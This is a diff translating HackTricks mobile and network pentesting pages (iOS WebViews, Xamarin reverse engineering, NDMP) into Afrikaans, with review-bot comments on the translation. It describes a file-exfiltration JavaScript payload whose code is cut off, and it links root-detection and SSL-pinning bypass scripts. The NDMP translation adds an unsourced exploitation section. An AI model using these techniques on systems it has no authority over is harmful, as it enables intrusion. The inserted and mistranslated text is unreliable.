`tel://`. These protocols enable the loading of both remote and local content within apps. It is emphasized that when loading local content, precautions must be taken to prevent users from influencing the file's name or path and from editing the content itself. - -**WebViews** offer different methods for content loading. For **UIWebView**, now deprecated, methods like `loadHTMLString:baseURL:` and `loadData:MIMEType:textEncodingName:baseURL:` are used. 
**WKWebView**, on the other hand, employs `loadHTMLString:baseURL:`, `loadData:MIMEType:textEncodingName:baseURL:`, and `loadRequest:` for web content. Methods such as `pathForResource:ofType:`, `URLForResource:withExtension:`, and `init(contentsOf:encoding:)` are typically utilized for loading local files. The method `loadFileURL:allowingReadAccessToURL:` is particularly notable for its ability to load a specific URL or directory into the WebView, potentially exposing sensitive data if a directory is specified. - -To find these methods in the source code or compiled binary, commands like the following can be used: +**WebViews** bied verskillende metodes vir inhoudsoplaai. Vir **UIWebView**, wat nou verouderd is, word metodes soos `loadHTMLString:baseURL:` en `loadData:MIMEType:textEncodingName:baseURL:` gebruik. **WKWebView** maak daarenteen gebruik van `loadHTMLString:baseURL:`, `loadData:MIMEType:textEncodingName:baseURL:`, en `loadRequest:` vir webinhoud. Metodes soos `pathForResource:ofType:`, `URLForResource:withExtension:`, en `init(contentsOf:encoding:)` word tipies gebruik vir die laai van plaaslike lêers. Die metode `loadFileURL:allowingReadAccessToURL:` is veral merkwaardig vir sy vermoë om 'n spesifieke URL of gids in die WebView te laai, wat moontlik sensitiewe data kan blootstel as 'n gids gespesifiseer word. +Om hierdie metodes in die bronkode of saamgestelde binêre lêer te vind, kan opdragte soos die volgende gebruik word: ```bash $ rabin2 -zz ./WheresMyBrowser | grep -i "loadHTMLString" 231 0x0002df6c 24 (4.__TEXT.__objc_methname) ascii loadHTMLString:baseURL: ``` +Met betrekking tot **lêertoegang** maak UIWebView dit universeel moontlik, terwyl WKWebView `allowFileAccessFromFileURLs` en `allowUniversalAccessFromFileURLs` instellings introduceer om toegang vanaf lêer-URL's te bestuur, waar beide standaard vals is. 
-Regarding **file access**, UIWebView allows it universally, whereas WKWebView introduces `allowFileAccessFromFileURLs` and `allowUniversalAccessFromFileURLs` settings for managing access from file URLs, with both being false by default. - -A Frida script example is provided to inspect **WKWebView** configurations for security settings: - +'n Voorbeeld van 'n Frida-skripsie word verskaf om **WKWebView**-konfigurasies vir sekuriteitsinstellings te ondersoek: ```bash ObjC.choose(ObjC.classes['WKWebView'], { - onMatch: function (wk) { - console.log('onMatch: ', wk); - console.log('URL: ', wk.URL().toString()); - console.log('javaScriptEnabled: ', wk.configuration().preferences().javaScriptEnabled()); - console.log('allowFileAccessFromFileURLs: ', - wk.configuration().preferences().valueForKey_('allowFileAccessFromFileURLs').toString()); - console.log('hasOnlySecureContent: ', wk.hasOnlySecureContent().toString()); - console.log('allowUniversalAccessFromFileURLs: ', - wk.configuration().valueForKey_('allowUniversalAccessFromFileURLs').toString()); - }, - onComplete: function () { - console.log('done for WKWebView!'); - } +onMatch: function (wk) { +console.log('onMatch: ', wk); +console.log('URL: ', wk.URL().toString()); +console.log('javaScriptEnabled: ', wk.configuration().preferences().javaScriptEnabled()); +console.log('allowFileAccessFromFileURLs: ', +wk.configuration().preferences().valueForKey_('allowFileAccessFromFileURLs').toString()); +console.log('hasOnlySecureContent: ', wk.hasOnlySecureContent().toString()); +console.log('allowUniversalAccessFromFileURLs: ', +wk.configuration().valueForKey_('allowUniversalAccessFromFileURLs').toString()); +}, +onComplete: function () { +console.log('done for WKWebView!'); +} }); ``` - -Lastly, an example of a JavaScript payload aimed at exfiltrating local files demonstrates the potential security risk associated with improperly configured WebViews. 
This payload encodes file contents into hex format before transmitting them to a server, highlighting the importance of stringent security measures in WebView implementations. - +Laastens, 'n voorbeeld van 'n JavaScript-vraglas wat gemik is op die uitlek van plaaslike lêers, demonstreer die potensiële veiligheidsrisiko wat verband hou met verkeerd gekonfigureerde WebViews. Hierdie vraglas kodeer lêerinhoude na heksformaat voordat dit na 'n bediener gestuur word, wat die belangrikheid van streng veiligheidsmaatreëls in WebView-implementasies beklemtoon. ```javascript String.prototype.hexEncode = function(){ - var hex, i; - var result = ""; - for (i=0; i - + ``` - -The native side handles the JavaScript call as shown in the `JavaScriptBridgeMessageHandler` class, where the result of operations like multiplying numbers is processed and sent back to JavaScript for display or further manipulation: - +Die inheemse kant hanteer die JavaScript-oproep soos getoon in die `JavaScriptBridgeMessageHandler`-klas, waar die resultaat van operasies soos die vermenigvuldiging van getalle verwerk en terug na JavaScript gestuur word vir vertoning of verdere manipulasie: ```swift class JavaScriptBridgeMessageHandler: NSObject, WKScriptMessageHandler { - // Handling "multiplyNumbers" operation - case "multiplyNumbers": - let arg1 = Double(messageArray[1])! - let arg2 = Double(messageArray[2])! - result = String(arg1 * arg2) - // Callback to JavaScript - let javaScriptCallBack = "javascriptBridgeCallBack('\(functionFromJS)','\(result)')" - message.webView?.evaluateJavaScript(javaScriptCallBack, completionHandler: nil) +// Handling "multiplyNumbers" operation +case "multiplyNumbers": +let arg1 = Double(messageArray[1])! +let arg2 = Double(messageArray[2])! 
+result = String(arg1 * arg2) +// Callback to JavaScript +let javaScriptCallBack = "javascriptBridgeCallBack('\(functionFromJS)','\(result)')" +message.webView?.evaluateJavaScript(javaScriptCallBack, completionHandler: nil) } ``` - ## Debugging iOS WebViews -(Tutorial based on the one from [https://blog.vuplex.com/debugging-webviews](https://blog.vuplex.com/debugging-webviews)) +(Tutoriaal gebaseer op dié van [https://blog.vuplex.com/debugging-webviews](https://blog.vuplex.com/debugging-webviews)) -To effectively debug web content within iOS webviews, a specific setup involving Safari's developer tools is required due to the fact that messages sent to `console.log()` are not displayed in Xcode logs. Here's a simplified guide, emphasizing key steps and requirements: +Om webinhoud binne iOS-webweergawes effektief te ontleed, is 'n spesifieke opset nodig wat betrekking het op Safari se ontwikkelertools, aangesien boodskappe wat na `console.log()` gestuur word nie in Xcode-logboeke vertoon word nie. Hier is 'n vereenvoudigde gids wat die sleutelstappe en vereistes beklemtoon: -- **Preparation on iOS Device**: The Safari Web Inspector needs to be activated on your iOS device. This is done by going to **Settings > Safari > Advanced**, and enabling the _Web Inspector_. +- **Voorbereiding op iOS-toestel**: Die Safari Web Inspector moet geaktiveer word op jou iOS-toestel. Dit word gedoen deur na **Instellings > Safari > Gevorderd** te gaan en die _Web Inspector_ te aktiveer. -- **Preparation on macOS Device**: On your macOS development machine, you must enable developer tools within Safari. Launch Safari, access **Safari > Preferences > Advanced**, and select the option to _Show Develop menu_. +- **Voorbereiding op macOS-toestel**: Op jou macOS-ontwikkelingsrekenaar moet jy ontwikkelertools in Safari aktiveer. Begin Safari, gaan na **Safari > Voorkeure > Gevorderd** en kies die opsie om die _Ontwikkel-menu te wys_. 
-- **Connection and Debugging**: After connecting your iOS device to your macOS computer and launching your application, use Safari on your macOS device to select the webview you want to debug. Navigate to _Develop_ in Safari's menu bar, hover over your iOS device's name to see a list of webview instances, and select the instance you wish to inspect. A new Safari Web Inspector window will open for this purpose. +- **Verbinding en ontleedwerk**: Nadat jy jou iOS-toestel aan jou macOS-rekenaar gekoppel het en jou toepassing begin het, gebruik Safari op jou macOS-toestel om die webweergawe wat jy wil ontleed, te kies. Navigeer na _Ontwikkel_ in Safari se menubalk, hou oor jou iOS-toestel se naam om 'n lys van webweergawe-eksemplare te sien, en kies die eksemplaar wat jy wil ondersoek. 'n Nuwe Safari Web Inspector-venster sal vir hierdie doel oopmaak. -However, be mindful of the limitations: +Wees egter bewus van die beperkings: -- Debugging with this method requires a macOS device since it relies on Safari. -- Only webviews in applications loaded onto your device through Xcode are eligible for debugging. Webviews in apps installed via the App Store or Apple Configurator cannot be debugged in this manner. +- Ontleedwerk met hierdie metode vereis 'n macOS-toestel aangesien dit afhanklik is van Safari. +- Slegs webweergawes in toepassings wat deur Xcode op jou toestel gelaai is, is geskik vir ontleedwerk. Webweergawes in programme wat via die App Store of Apple Configurator geïnstalleer is, kan nie op hierdie manier ontleed word nie. 
-## References +## Verwysings * [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#testing-webview-protocol-handlers-mstg-platform-6](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#testing-webview-protocol-handlers-mstg-platform-6) * [https://github.com/authenticationfailure/WheresMyBrowser.iOS](https://github.com/authenticationfailure/WheresMyBrowser.iOS) @@ -308,14 +278,14 @@ However, be mindful of the limitations:
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
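Review bot: several lines in the main hunk change the meaning rather than the language, and the code blocks were edited although a translation should leave them alone. Meaning: "**WebViews** bied verskillende metodes vir inhoudsoplaai" says "content upload" where the source says content loading, use "vir die laai van inhoud"; "'n Voorbeeld van 'n Frida-skripsie" turns "Frida script" into "Frida thesis", use "Frida-skrip"; "Oorsig van Statische Analise" uses the Dutch "Statische" while the body of the same section says "statiese"; "Slegs Sekure Inhoud Verifikasie" is not Afrikaans, "Verifikasie van Slegs Veilige Inhoud" matches the `hasOnlySecureContent` sentence below it; "Gevalle van WebViews word suksesvol opgespoor" uses "gevalle" (cases) where every other line uses "instansies". UI labels: "**Instellings > Safari > Gevorderd**", "**Safari > Voorkeure > Gevorderd**", "_Ontwikkel_" and "_Ontwikkel-menu te wys_" translate menu names that the reader has to find in Safari, which ships no Afrikaans locale; keep "Settings > Safari > Advanced", "Safari > Preferences > Advanced", "Develop" and "Show Develop menu" as in the source, with a gloss if wanted. The heading "## Debugging iOS WebViews" is left in English while every sibling heading in the hunk is translated. Code: every indented line of `webviews_inspector.js`, of the second Frida snippet and of the Swift `JavaScriptBridgeMessageHandler` fragment is replaced by an unindented copy (`-    onMatch: function (wk) {` becomes `+onMatch: function (wk) {`), and the blank lines before and after each ```bash fence are removed; revert those code and fence lines to the original bytes so the diff only touches prose, and, since the fence is being touched anyway, the second Frida snippet is tagged ```bash although it is JavaScript.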
diff --git a/mobile-pentesting/xamarin-apps.md b/mobile-pentesting/xamarin-apps.md index 8edda1c77..d505168f4 100644 --- a/mobile-pentesting/xamarin-apps.md +++ b/mobile-pentesting/xamarin-apps.md @@ -2,85 +2,81 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-This is a summary of the blog post [https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers](https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers) +Hierdie is 'n opsomming van die blogpos [https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers](https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers) -## **Basic Information** +## **Basiese Inligting** -Xamarin is an **open-source platform** designed for developers to **build apps for iOS, Android, and Windows** using the .NET and C# frameworks. This platform offers access to numerous tools and extensions to create modern applications efficiently. +Xamarin is 'n **open-source platform** wat ontwikkel is vir ontwikkelaars om programme vir iOS, Android en Windows te bou met behulp van die .NET en C# raamwerke. Hierdie platform bied toegang tot verskeie gereedskap en uitbreidings om moderne toepassings doeltreffend te skep. -### Xamarin's Architecture +### Xamarin se Argitektuur -- For **Android**, Xamarin integrates with Android and Java namespaces through .NET bindings, operating within the Mono execution environment alongside the Android Runtime (ART). Managed Callable Wrappers (MCW) and Android Callable Wrappers (ACW) facilitate communication between Mono and ART, both of which are built on the Linux kernel. -- For **iOS**, applications run under the Mono runtime, utilizing full Ahead of Time (AOT) compilation to convert C# .NET code into ARM assembly language. This process runs alongside the Objective-C Runtime on a UNIX-like kernel. +- Vir **Android** integreer Xamarin met Android- en Java-naamruimtes deur .NET-bindings, wat binne die Mono-uitvoeringsomgewing saam met die Android Runtime (ART) werk. Managed Callable Wrappers (MCW) en Android Callable Wrappers (ACW) fasiliteer kommunikasie tussen Mono en ART, wat albei op die Linux-kernel gebaseer is. 
+- Vir **iOS** loop programme onder die Mono-runtime en maak volledige Ahead of Time (AOT) samestelling gebruik om C# .NET-kode na ARM-assambleertaal om te skakel. Hierdie proses loop saam met die Objective-C Runtime op 'n UNIX-soortgelyke kernel. -### .NET Runtime and Mono Framework +### .NET Runtime en Mono Raamwerk -The **.NET framework** includes assemblies, classes, and namespaces for application development, with the .NET Runtime managing code execution. It offers platform independence and backward compatibility. The **Mono Framework** is an open-source version of the .NET framework, initiated in 2005 to extend .NET to Linux, now supported by Microsoft and led by Xamarin. +Die **.NET-raamwerk** sluit samestellings, klasse en naamruimtes vir toepassingsontwikkeling in, met die .NET Runtime wat kode-uitvoering bestuur. Dit bied platform-onafhanklikheid en agterwaartse versoenbaarheid. Die **Mono-raamwerk** is 'n open-source weergawe van die .NET-raamwerk, wat in 2005 begin is om .NET na Linux uit te brei, en word nou ondersteun deur Microsoft en gelei deur Xamarin. -### Reverse Engineering Xamarin Apps +### Reverse Engineering van Xamarin Apps -#### Decompilation of Xamarin Assemblies +#### Decompilering van Xamarin-samestellings -Decompilation transforms compiled code back into source code. In Windows, the Modules window in Visual Studio can identify modules for decompilation, allowing for direct access to third-party code and extraction of source code for analysis. +Decompilering omskep saamgestelde kode terug na bronkode. In Windows kan die Modules-venster in Visual Studio modules identifiseer vir decompilering, wat direkte toegang tot derdeparty-kode en die onttrekking van bronkode vir analise moontlik maak. -#### JIT vs AOT Compilation +#### JIT vs AOT Samestelling -- **Android** supports Just-In-Time (JIT) and Ahead-Of-Time (AOT) compilation, with a Hybrid AOT mode for optimal execution speed. Full AOT is exclusive to Enterprise licenses. 
-- **iOS** solely employs AOT compilation due to Apple's restrictions on dynamic code execution. +- **Android** ondersteun Just-In-Time (JIT) en Ahead-Of-Time (AOT) samestelling, met 'n Hybrid AOT-modus vir optimale uitvoerspoed. Volledige AOT is eksklusief vir Enterprise-lisensies. +- **iOS** gebruik slegs AOT-samestelling as gevolg van Apple se beperkings op dinamiese kode-uitvoering. -### Extracting dll Files from APK/IPA - -To access the assemblies in an APK/IPA, unzip the file and explore the assemblies directory. For Android, tools like [XamAsmUnZ](https://github.com/cihansol/XamAsmUnZ) and [xamarin-decompress](https://github.com/NickstaDB/xamarin-decompress) can uncompress dll files. +### Onttrekking van dll-lêers uit APK/IPA +Om toegang te verkry tot die samestellings in 'n APK/IPA, pak die lêer uit en verken die samestellingsgids. Vir Android kan gereedskap soos [XamAsmUnZ](https://github.com/cihansol/XamAsmUnZ) en [xamarin-decompress](https://github.com/NickstaDB/xamarin-decompress) dll-lêers ontkomprimeer. ```bash python3 xamarin-decompress.py -o /path/to/decompressed/apk ``` - -For assembly blobs in Android, [pyxamstore](https://github.com/jakev/pyxamstore) can unpack them. - +Vir saamgestelde blobs in Android, kan [pyxamstore](https://github.com/jakev/pyxamstore) hulle uitpak. ```bash pyxamstore unpack -d /path/to/decompressed/apk/assemblies/ ``` +iOS dll-lêers is maklik toeganklik vir dekompilering, wat beduidende dele van die toepassingskode onthul, wat dikwels 'n gemeenskaplike basis deel oor verskillende platforms. -iOS dll files are readily accessible for decompilation, revealing significant portions of the application code, which often shares a common base across different platforms. +### Dinamiese Analise -### Dynamic Analysis +Dinamiese analise behels die nagaan van SSL-pinning en die gebruik van hulpmiddels soos [Fridax](https://github.com/NorthwaveSecurity/fridax) vir tydveranderinge van die .NET-binêre lêer in Xamarin-toepassings. 
Frida-skripte is beskikbaar om wortelopsporing of SSL-pinning te omseil en analise-vermoëns te verbeter. -Dynamic analysis involves checking for SSL pinning and using tools like [Fridax](https://github.com/NorthwaveSecurity/fridax) for runtime modifications of the .NET binary in Xamarin apps. Frida scripts are available to bypass root detection or SSL pinning, enhancing analysis capabilities. - -Other interesting Frida scripts: +Ander interessante Frida-skripte: * [**xamarin-antiroot**](https://codeshare.frida.re/@Gand3lf/xamarin-antiroot/) * [**xamarin-root-detect-bypass**](https://codeshare.frida.re/@nuschpl/xamarin-root-detect-bypass/) * [**Frida-xamarin-unpin**](https://github.com/GoSecure/frida-xamarin-unpin) -## Further information +## Verdere inligting * [https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers](https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers) * [https://thecobraden.com/posts/unpacking\_xamarin\_assembly\_stores/](https://thecobraden.com/posts/unpacking\_xamarin\_assembly\_stores/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
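Review bot: three terms in this hunk are mistranslated in a way that changes the technical meaning. "gebruik van hulpmiddels soos Fridax vir tydveranderinge van die .NET-binêre lêer" renders "runtime modifications" as "time changes"; use "looptyd-wysigings aan die .NET-binêre lêer". "om wortelopsporing of SSL-pinning te omseil" turns Android root detection into a botanical root; keep the platform term, "root-opsporing". "Vir saamgestelde blobs in Android, kan pyxamstore hulle uitpak" says "compiled blobs" where the source says assembly blobs, and the same hunk already translates assemblies as "samestellings", so "samestelling-blobs" keeps the terms aligned. Smaller points: "ARM-assambleertaal" is a typo for "assembleertaal"; "Decompilering van Xamarin-samestellings" and "Decompilering omskep ..." spell the word with c while the iOS sentence in the same hunk says "maklik toeganklik vir dekompilering", pick one; the blank lines around the two ```bash fences are removed again. The repeated support block is also translated inconsistently inside one file: the header says "amptelike PEASS & HackTricks swag", "hacktruuks" and "github-repos", the footer says "HackTricks-uitrusting", "haktruuks" and "github-opslag"; since this block appears on every page, fix one rendering and reuse it verbatim.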
diff --git a/network-services-pentesting/10000-network-data-management-protocol-ndmp.md b/network-services-pentesting/10000-network-data-management-protocol-ndmp.md index 7ffe3d361..bf4ad3f92 100644 --- a/network-services-pentesting/10000-network-data-management-protocol-ndmp.md +++ b/network-services-pentesting/10000-network-data-management-protocol-ndmp.md @@ -1,39 +1,63 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-# **Protocol Information** +# **Protokol Inligting** -From [Wikipedia](https://en.wikipedia.org/wiki/NDMP): +Van [Wikipedia](https://en.wikipedia.org/wiki/NDMP): -> **NDMP**, or **Network Data Management Protocol**, is a protocol meant to transport data between network attached storage \([NAS](https://en.wikipedia.org/wiki/Network-attached_storage)\) devices and [backup](https://en.wikipedia.org/wiki/Backup) devices. This removes the need for transporting the data through the backup server itself, thus enhancing speed and removing load from the backup server. - -**Default port:** 10000 +> **NDMP**, of **Network Data Management Protocol**, is 'n protokol wat bedoel is om data tussen netwerkaangehegte stoorplek \([NAS](https://en.wikipedia.org/wiki/Network-attached_storage)\) toestelle en [backup](https://en.wikipedia.org/wiki/Backup) toestelle te vervoer. Dit verwyder die behoefte om die data deur die rugsteunbediener self te vervoer, wat die spoed verbeter en die las van die rugsteunbediener verwyder. +**Verstekpoort:** 10000 ```text PORT STATE SERVICE REASON VERSION 10000/tcp open ndmp syn-ack Symantec/Veritas Backup Exec ndmp ``` +# **Opsomming** -# **Enumeration** +Enumeration is 'n belangrike fase in die pentesting-proses wat dit moontlik maak om inligting oor 'n teikenstelsel te versamel. Dit behels die identifisering van aktiewe dienste, poorte, gebruikers en ander relevante inligting wat kan help om 'n aanval te beplan. +## **Network Data Management Protocol (NDMP)** + +Die Network Data Management Protocol (NDMP) is 'n protokol wat gebruik word vir die bestuur en beskerming van netwerkdata. Dit maak dit moontlik om data vanaf 'n netwerkstelsel na 'n sekondêre stoorplek te stuur, soos 'n bandeenheid of skyf. + +### **NDMP Enumeration** + +By die uitvoer van 'n NDMP-enumerasie, is dit moontlik om inligting oor die NDMP-diens op 'n teikenstelsel te bekom. Hier is 'n paar tegnieke wat gebruik kan word om NDMP-inligting te versamel: + +1. 
**Poortskandering**: Deur die skandering van poorte op die teikenstelsel kan jy aktiewe NDMP-poorte identifiseer. Die standaardpoort vir NDMP is 10000. + +2. **Banner Grabbing**: Deur die gebruik van 'n netwerktoetsinstrument soos Telnet of Netcat, kan jy probeer om die NDMP-diens se banierinligting te bekom. Dit kan nuttige inligting verskaf oor die gebruikte NDMP-weergawe en -implementering. + +3. **NDMP-spoor**: Dit behels die ondersoek van die teikenstelsel se loglêers vir enige verwysings na NDMP-aktiwiteite. Dit kan help om inligting oor die gebruikte NDMP-weergawe, konfigurasie en moontlike kwesbaarhede te vind. + +4. **NDMP-bruteforcing**: As jy 'n geldige gebruikersnaam en wagwoord het, kan jy probeer om in te log op die NDMP-diens deur middel van bruteforcing. Dit behels die outomatiese poging om verskillende kombinasies van gebruikersname en wagwoorde te probeer totdat 'n suksesvolle inlogpoging plaasvind. + +### **NDMP Exploitation** + +Nadat jy relevante inligting oor die NDMP-diens op 'n teikenstelsel versamel het, kan jy dit moontlik uitbuit om toegang tot die stelsel te verkry. Hier is 'n paar moontlike uitbuitingstegnieke: + +1. **Kwesbaarheidsuitbuiting**: As jy 'n bekende kwesbaarheid in die gebruikte NDMP-weergawe en -implementering identifiseer, kan jy dit moontlik uitbuit om toegang tot die stelsel te verkry. Dit kan behels om spesifieke aanvalskode te gebruik of 'n bekende uitbuitingsraamwerk te implementeer. + +2. **Misbruik van swak konfigurasie**: As jy 'n swak konfigurasie in die NDMP-diens identifiseer, soos 'n onveilige wagwoordbeleid of onvoldoende toegangsbeheer, kan jy dit moontlik misbruik om toegang tot die stelsel te verkry. + +3. **Man-in-die-middel-aanvalle**: As jy in staat is om die netwerkverkeer tussen die NDMP-diens en die stoorplek te onderskep, kan jy dit moontlik gebruik om gevoelige inligting te onderskep of te manipuleer. 
+ +Dit is belangrik om te onthou dat enige uitbuiting van 'n teikenstelsel slegs uitgevoer moet word met toestemming van die eienaar van die stelsel. ```bash nmap -n -sV --script "ndmp-fs-info or ndmp-version" -p 10000 #Both are default scripts ``` - ## Shodan `ndmp` @@ -42,16 +66,14 @@ nmap -n -sV --script "ndmp-fs-info or ndmp-version" -p 10000 #Both are defa
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 